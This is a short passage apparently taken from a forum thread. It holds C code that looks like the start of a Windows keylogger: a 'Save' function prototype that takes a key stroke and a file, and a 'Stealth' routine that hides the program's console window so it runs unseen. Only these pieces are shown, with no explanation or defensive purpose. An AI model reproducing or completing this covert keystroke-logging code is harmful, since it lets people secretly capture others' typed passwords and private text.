0 Members and 1 Guest are viewing this topic.
int Save (int key_stroke, char *file);
void Stealth();
void Stealth(){ HWND stealth; AllocConsole(); stealth = FindWindowA("ConsoleWindowClass", NULL); ShowWindow(stealth,0);}